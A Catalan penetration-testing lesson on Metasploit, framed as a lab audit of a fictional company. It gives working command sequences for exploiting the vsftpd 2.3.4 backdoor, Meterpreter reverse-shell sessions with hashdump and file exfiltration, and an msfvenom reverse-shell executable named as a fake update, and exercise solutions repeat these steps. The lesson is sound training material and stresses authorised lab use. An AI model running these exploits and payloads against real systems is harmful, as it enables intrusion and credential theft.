Amb Kali instal·lat i un laboratori aïllat on practicar (07-01), obrim la primera gran eina de la seva caixa. Durant l'auditoria de TechNova S.L. vam recórrer a Metasploit diverses vegades: al Mòdul 4 el vam fer servir per explotar un servei de xarxa vulnerable a la 10.10.10.0/24, i al Mòdul 5 el seu payload Meterpreter ens va donar la consola amb què vam fer postexplotació, pivoting i escalada. El vam fer servir de passada, centrats en el mètode. Ara toca dominar-lo a fons.

Aquesta lliçó desglossa l'arquitectura de Metasploit (msfconsole, els tipus de mòdul, Meterpreter, msfvenom, la base de dades i els workspaces), el seu flux de treball canònic —search → use → options → run— aplicat de manera responsable contra el laboratori de TechNova, l'ús de Meterpreter per a la postexplotació, i la seva integració amb la base de dades i amb Nmap. Com tota eina ofensiva, Metasploit només es fa servir contra objectius autoritzats o el teu propi laboratori, i amb control de l'impacte: veuràs per què check abans d'exploit és un costum professional.

Contingut

  1. Què és Metasploit i les seves edicions
  2. Arquitectura: msfconsole, mòduls i base de dades
  3. Tipus de mòdul
  4. El flux de treball: search → use → options → run
  5. Exemple responsable contra el laboratori de TechNova
  6. Meterpreter i postexplotació
  7. msfvenom: generació de payloads
  8. Integració amb Nmap i la base de dades
  9. Errors Comuns i Consells
  10. Exercicis
  11. Conclusió

  1. Què és Metasploit i les seves edicions

Metasploit Framework és una plataforma de codi obert (Rapid7) per desenvolupar, provar i executar exploits. La seva gran aportació és l'estandardització: centenars d'exploits, payloads i mòduls auxiliars comparteixen la mateixa interfície, de manera que aprendre el flux una vegada et serveix per a tots.

Edició Cost Interfície Ús típic
Framework Gratuïta, open source CLI (msfconsole) La que fem servir; base de tot
Pro Comercial Web + automatització Equips, campanyes grans, reporting

A Kali ve preinstal·lat el Framework. Tot el d'aquesta lliçó es fa amb msfconsole, la consola interactiva.

  1. Arquitectura: msfconsole, mòduls i base de dades

Metasploit s'organitza al voltant d'una consola que carrega mòduls i es recolza en una base de dades per recordar la feina.

flowchart TD
    A[msfconsole - consola interactiva] --> B[Moduls]
    B --> B1[exploit]
    B --> B2[payload]
    B --> B3[auxiliary]
    B --> B4[post]
    B --> B5[encoder / nop]
    A --> C[Base de dades PostgreSQL]
    C --> C1[workspaces: hosts, serveis, credencials, loot]
    A --> D[msfvenom - generador de payloads standalone]
    B2 --> E[Meterpreter - payload avancat postexplotacio]
  • msfconsole: la interfície principal. Des d'ella cerques, configures i llances mòduls.
  • Base de dades (PostgreSQL): desa hosts, ports, serveis, vulnerabilitats i credencials descobertes. Els workspaces separen per projecte (un workspace technova per no barrejar clients).
  • msfvenom: eina a part per generar payloads independents (un executable, un script).

Arrencar la base de dades i crear el workspace de l'engagement:

sudo msfdb init        # inicialitza PostgreSQL per a Metasploit (un sol cop)
msfconsole             # obre la consola
msf6 > workspace -a technova   # crea i entra en un workspace del projecte
msf6 > db_status               # confirma que la BBDD esta connectada

Treballar en un workspace per client és una bona pràctica d'organització que enllaça directament amb la documentació del Mòdul 6: tot el que Metasploit descobreix queda registrat i exportable.

  1. Tipus de mòdul

Entendre els cinc tipus de mòdul és entendre Metasploit.

Tipus Què fa Exemple
exploit Aprofita una vulnerabilitat concreta exploit/multi/http/...
payload Codi que s'executa després d'explotar (la "càrrega") meterpreter/reverse_tcp
auxiliary Tasques sense explotació: escaneig, fuzzing, brute force, DoS auxiliary/scanner/...
post Accions després del compromís (recol·lecció, pivoting) post/multi/gather/...
encoder / nop Codifiquen/ajusten el payload (evasió, alineació) x86/shikata_ga_nai

Relació clau: un exploit obre la porta i entrega un payload; el payload més potent és Meterpreter; després fas servir mòduls post. Els auxiliary són navalla suïssa i no sempre impliquen explotar (molts només escanegen o comproven).

  1. El flux de treball: search → use → options → run

El flux canònic de Metasploit té sempre la mateixa forma. Domina aquests cinc passos i sabràs fer servir qualsevol mòdul.

  1. search — localitzar el mòdul adequat.
  2. use — seleccionar-lo.
  3. options / info — veure què necessita.
  4. set — configurar objectiu, payload i paràmetres.
  5. check / run (exploit) — verificar i executar.
msf6 > search vsftpd                     # 1. cercar per servei/CVE/nom
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor   # 2. seleccionar
msf6 exploit(...) > options              # 3. veure parametres requerits
msf6 exploit(...) > set RHOSTS 10.10.10.20   # 4. objectiu AUTORITZAT (el meu lab)
msf6 exploit(...) > check                # 5a. verificar SENSE explotar (si el modul ho suporta)
msf6 exploit(...) > exploit              # 5b. llancar

Les comandes RHOSTS (objectiu remot), LHOST/LPORT (el teu Kali, on torna la connexió) i payload són els paràmetres que més configuraràs. info mostra la descripció completa, el CVE i les opcions del mòdul.

Ús responsable — check abans d'exploit: molts exploits ofereixen check, que comprova si l'objectiu és vulnerable sense arribar a explotar-lo. És l'opció prudent: confirma el diagnòstic amb el mínim impacte, cosa essencial en un engagement real on un exploit pot tombar un servei en producció. Primer check; només si escau i està autoritzat, exploit.

  1. Exemple responsable contra el laboratori de TechNova

Reproduïm, contra una VM del nostre laboratori que simula un servidor de TechNova, el tipus d'explotació de xarxa del Mòdul 4. La VM víctima té la IP 10.10.10.20 i Kali 10.10.10.5.

msf6 > workspace technova
msf6 > db_nmap -sV 10.10.10.20            # Nmap des de Metasploit; ho desa tot a la BBDD
msf6 > search name:vsftpd type:exploit
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(vsftpd_234_backdoor) > set RHOSTS 10.10.10.20
msf6 exploit(vsftpd_234_backdoor) > check     # confirmar vulnerabilitat
[+] 10.10.10.20:21 - The target is vulnerable.
msf6 exploit(vsftpd_234_backdoor) > exploit
[*] Command shell session 1 opened

Què acaba de passar, pas a pas:

  • db_nmap executa Nmap i aboca els resultats a la base de dades del workspace: hosts i serveis queden registrats sense escriure res a mà.
  • search amb filtres (name:, type:) acota entre milers de mòduls.
  • check confirma que la VM és vulnerable abans de tocar-la.
  • exploit llança el mòdul i obre una sessió.

Tot això és legal perquè 10.10.10.20 és una màquina teva a la xarxa host-only del laboratori. Contra un sistema real, caldrien autorització per escrit i control de l'impacte.

  1. Meterpreter i postexplotació

Meterpreter és el payload estrella de Metasploit: una consola avançada que viu en memòria del procés compromès, xifra la seva comunicació i ofereix desenes de comandes de postexplotació sense escriure binaris al disc. És el que vam fer servir al Mòdul 5.

Per obtenir-lo, es tria com a payload abans d'explotar:

msf6 exploit(...) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(...) > set LHOST 10.10.10.5      # el meu Kali: aqui torna la sessio
msf6 exploit(...) > set LPORT 4444
msf6 exploit(...) > exploit
meterpreter >

Comandes habituals de Meterpreter i la seva funció:

Comanda Què fa
sysinfo Informació del sistema compromès
getuid Amb quin usuari s'executa la sessió
getsystem Intent d'escalada a SYSTEM (Windows)
hashdump Aboca hashes de contrasenyes (per a John/Hashcat, Mòd. 4)
download / upload Exfiltrar/pujar fitxers
portfwd / run autoroute Pivoting cap a xarxes internes (Mòd. 5)
background Deixa la sessió en segon pla sense tancar-la

reverse_tcp significa que la víctima es connecta cap a tu (per això configures LHOST/LPORT), cosa que sol travessar millor els firewalls de sortida que una connexió directa. Amb la sessió en background pots llançar mòduls post o pivotar cap a altres subxarxes, tal com vam fer a la 10.10.10.0/24.

  1. msfvenom: generació de payloads

msfvenom genera payloads independents (un .exe, un .elf, un script) per a escenaris on no hi ha un exploit remot directe: per exemple, un fitxer que s'entrega en un exercici d'enginyeria social autoritzat. Combina en una sola eina la generació i la codificació.

# Payload Meterpreter per a Windows, en un executable, que torna al meu Kali del lab
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.10.5 LPORT=4444 \
  -f exe -o /tmp/actualitzacio.exe
  • -p selecciona el payload; LHOST/LPORT indiquen on torna la sessió.
  • -f exe defineix el format de sortida; -o el fitxer.

Per rebre la sessió que generi aquest payload, s'aixeca un listener amb el mòdul multi/handler:

msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.10.10.5
msf6 > set LPORT 4444
msf6 > run

Ús responsable: un binari així només s'executa al teu laboratori o en un exercici amb abast autoritzat i consentiment explícit. Fora d'aquí, distribuir un payload és activitat maliciosa. Contrapartida defensiva: els antivirus/EDR detecten payloads de msfvenom sense ofuscar; entendre això ajuda l'equip blau a afinar les seves regles de detecció.

  1. Integració amb Nmap i la base de dades

La força de Metasploit en un engagement llarg és que recorda. Amb la base de dades activa:

msf6 > db_nmap -sV -p- 10.10.10.0/24    # escaneja i importa tot al workspace
msf6 > hosts                            # llista els hosts descoberts
msf6 > services                         # llista ports/serveis
msf6 > vulns                            # vulnerabilitats associades
msf6 > creds                            # credencials recol·lectades
msf6 > loot                             # dades exfiltrades (hashes, fitxers)

També pots importar un escaneig fet fora amb db_import escaneig.xml (Nmap amb -oX). Tota aquesta informació —hosts, serveis, credencials, loot— és exactament la que alimenta la documentació de troballes del Mòdul 6: exportable, ordenada per workspace i traçable. Metasploit no és només un llançador d'exploits; és també un quadern de camp de l'engagement.

Errors Comuns i Consells

  • Llançar exploit sense check. Un exploit pot tombar un servei real. Verifica primer amb check i controla l'impacte.
  • Confondre LHOST i RHOST. RHOSTS és l'objectiu; LHOST és el teu Kali (on torna la sessió). Invertir-los fa que l'exploit "no funcioni" sense causa aparent.
  • Treballar sense base de dades ni workspace. Perds la traçabilitat i barreges clients. Executa msfdb init i crea un workspace per engagement.
  • Payload incompatible amb l'objectiu. Un payload Windows contra un Linux no obrirà sessió. Ajusta el payload a la plataforma (options/show payloads).
  • Fer servir msfvenom fora del laboratori. Distribuir payloads sense autorització és activitat maliciosa. Restringeix-ho al teu lab o a un scope signat.
  • Consell: fes servir info i check com a reflex abans de cada exploit. Llegir què fa un mòdul i confirmar que l'objectiu és vulnerable és la diferència entre un professional i qui dispara a cegues.

Exercicis

Exercici 1. Al teu laboratori tens una VM víctima a 10.10.10.20 i Kali a 10.10.10.5. Escriu la seqüència completa de msfconsole per a: crear un workspace technova, escanejar la víctima important el resultat a la BBDD, cercar un exploit per al servei vulnerable, verificar que és explotable i, si ho és, llançar-lo. Indica quins paràmetres configures.

Exercici 2. Explica la diferència entre un mòdul exploit, un auxiliary i un post, i posa un exemple de quan faries servir cadascun durant l'auditoria de TechNova.

Exercici 3. Vols generar amb msfvenom un executable Windows que et retorni una sessió Meterpreter al teu Kali del laboratori. Escriu la comanda de generació i les comandes per aixecar el listener que rebi la sessió. Afegeix una frase sobre per què això només és legítim al teu laboratori.

Solucions

Solució 1.

msf6 > workspace -a technova
msf6 > db_nmap -sV 10.10.10.20
msf6 > search type:exploit name:<servei>
msf6 > use exploit/<ruta_del_modul>
msf6 exploit(...) > set RHOSTS 10.10.10.20
msf6 exploit(...) > check
msf6 exploit(...) > exploit

Configuro RHOSTS amb l'objectiu autoritzat (la meva VM). Si l'exploit retorna una shell inversa, també fixaria LHOST 10.10.10.5 i LPORT. db_nmap desa hosts i serveis al workspace, i check confirma la vulnerabilitat abans d'explotar, controlant l'impacte.

Solució 2. Un exploit aprofita una vulnerabilitat per aconseguir accés (p. ex., explotar el servei de xarxa vulnerable de la VM de TechNova). Un auxiliary fa tasques sense explotar: escanejar ports, fer fuzzing o provar credencials (p. ex., un scanner per enumerar serveis). Un post actua després del compromís, amb una sessió ja oberta: recol·lectar informació, abocar hashes o preparar el pivoting cap a la 10.10.10.0/24. En ordre temporal de l'engagement: primer auxiliary/recon, després exploit, després post.

Solució 3.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f exe -o /tmp/payload.exe
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.10.10.5
msf6 > set LPORT 4444
msf6 > run

Només és legítim al meu laboratori (o sota un scope autoritzat per escrit amb consentiment explícit) perquè generar i executar un payload que obre una porta del darrere en un altre sistema sense permís és una acció maliciosa i il·legal.

Conclusió

Metasploit és molt més que un llançador d'exploits: és un framework amb una arquitectura coherent —msfconsole, cinc tipus de mòdul, Meterpreter, msfvenom i una base de dades amb workspaces— que estandarditza tota la feina ofensiva sota un mateix flux: search → use → options → check → run. Vam veure aquest flux aplicat de manera responsable contra el laboratori de TechNova, com Meterpreter habilita la postexplotació que vam fer al Mòdul 5, com msfvenom genera payloads independents i com la integració amb Nmap i la base de dades converteix Metasploit en el quadern de camp de l'engagement, alimentant directament l'informe del Mòdul 6. I un costum que ho resumeix tot: check abans d'exploit, perquè el control de l'impacte és tan professional com l'èxit de l'atac.

Dominat el framework d'explotació de xarxa i sistemes, canviem de terreny. La botiga tienda.technova.lab era una aplicació web, i per auditar-la a fons cal un instrument diferent: un proxy d'intercepció. A la lliçó següent estudiem l'estàndard del sector, Burp Suite.

© Copyright 2026. Tots els drets reservats